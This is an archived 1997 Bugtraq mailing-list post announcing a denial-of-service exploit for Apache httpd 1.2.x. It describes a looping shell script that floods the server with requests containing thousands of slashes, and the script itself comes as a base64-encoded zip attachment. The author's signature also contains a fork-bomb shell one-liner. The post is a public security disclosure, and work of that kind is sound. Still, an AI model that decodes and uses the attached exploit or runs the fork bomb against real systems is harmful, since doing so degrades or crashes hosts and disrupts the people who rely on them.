Home page logo
/

bugtraq logo Bugtraq mailing list archives

Apache DoS attack?
From: lcamtuf () POLBOX COM (Micha? Zalewski)
Date: Tue, 30 Dec 1997 11:07:04 +0100


This is a multi-part message in MIME format.

------=_NextPart_000_0041_01BD1513.0F761240
Content-Type: text/plain;
        charset="iso-8859-2"
Content-Transfer-Encoding: quoted-printable



[execuse me if it has been discovered before]

Here's a simple exploit for Apache httpd version 1.2.x (tested on =
1.2.4).
When launched, causes incerases of victim's load average and extreme
slowdowns of disk operations. On my i586 Linux annoying slowdown has =
been
experienced immediately (after maybe 5 seconds). After about 4 minutes
work has been turned into real hell (286?).

Attached program ('beck') is a shell script. It works by sending
excessive http requests with thousands of '/'s inside (parsed from file
'beck.dat'). Single request causes just a little longer thinking of
Apache. But when requests are sent from a loop - huh, victim
system becomes slower and slower... At least on my machine, maybe when
Apache is running on a lightspeed workstation this script makes no
difference.

PS. Fast connection should help... All depends on victim's system
performance.

_______________________________________________________________________
Michal Zalewski [tel 9690] | finger 4 PGP [lcamtuf () boss staszic waw pl]
=3D--------- [ echo "while [ -f \$0 ]; do \$0 &;done" >_;. _ ] =
---------=3D


------=_NextPart_000_0041_01BD1513.0F761240
Content-Type: application/x-zip-compressed;
        name="beck.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
        filename="beck.zip"

UEsDBBQAAgAIAGCmnSMQwy97+QEAAKADAAAEABAAYmVja1VYDADzFKg0I/+nNAAAAACFUl1P2zAU
fc+vOHgVbJqStvAydYDGumpCDJAKe1mFwHFuawvXrmynQdN+/JyPfrBNmh8iJTnn3HPO9ZuDfq5M
P+deJgkJaZsH2OfJ+AppiosVF5IwzI6zF3who7iGneOO1kqQBw+Bi2fWkS7KIK0b4VoJGXE/uKbK
PyucasGXoZx/yq33mQ/c/1Qiq3iVrfR5S04SNccMrDdkODsDY3j4iCDJJEAr/v3u4utkhN4AcXRQ
y0dpfcBMSKUL/8A63BaOVzCk4EXhyPvaffsHrjRGmUWXke1RW1G0J4WxWU3zalnqwA2RLT2ENYai
jjUes5PBKwcvKmCQzFWSjG9vbh6/XV5f3p+dDLYhjxkO/gi5B+wdN9QGe4B0jpzEc1bw8Fcnk+n0
djrCXGnC0QZ1hGUZI+eEleaCCigDUTpHJqBQLvu30W6DzT7rUnpDvF0rjt7O2H7kd/XlGAen348R
LHhuXcg29+BeknLQlhfga3J8QfDWGlRKawitljmkWkhyiMCFDD4yk0rWKWZ13rjjmLSoHQbShkLt
5sMAp9siDs/7Ba37poyChxHW9brzypBGNfa08r8WjlZIRSf1tF9612NqwMZ764wOYy+O6mtRxP1X
XIXYSZZlYA1r4/U/E9nWPWvHNpHq4zVFyLB5K6yhnRd2e1XPiCtpvv8GUEsDBBQAAgAIAHmdnSPu
voPlIgAAAPYfAAAIABAAYmVjay5kYXRVWAwAZwSoNGbvpzQAAAAA7cFBEQAABACwvxQaSOEU0D+L
HO62TW8WAAAAAAAAAPBPHFBLAQIVAxQAAgAIAGCmnSMQwy97+QEAAKADAAAEAAwAAAAAAAEAAED/
gQAAAABiZWNrVVgIAPMUqDQj/6c0UEsBAhUDFAACAAgAeZ2dI+6+g+UiAAAA9h8AAAgADAAAAAAA
AQAAQLaBKwIAAGJlY2suZGF0VVgIAGcEqDRm76c0UEsFBgAAAAACAAIAgAAAAIMCAAAAAA==

------=_NextPart_000_0041_01BD1513.0F761240--



  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]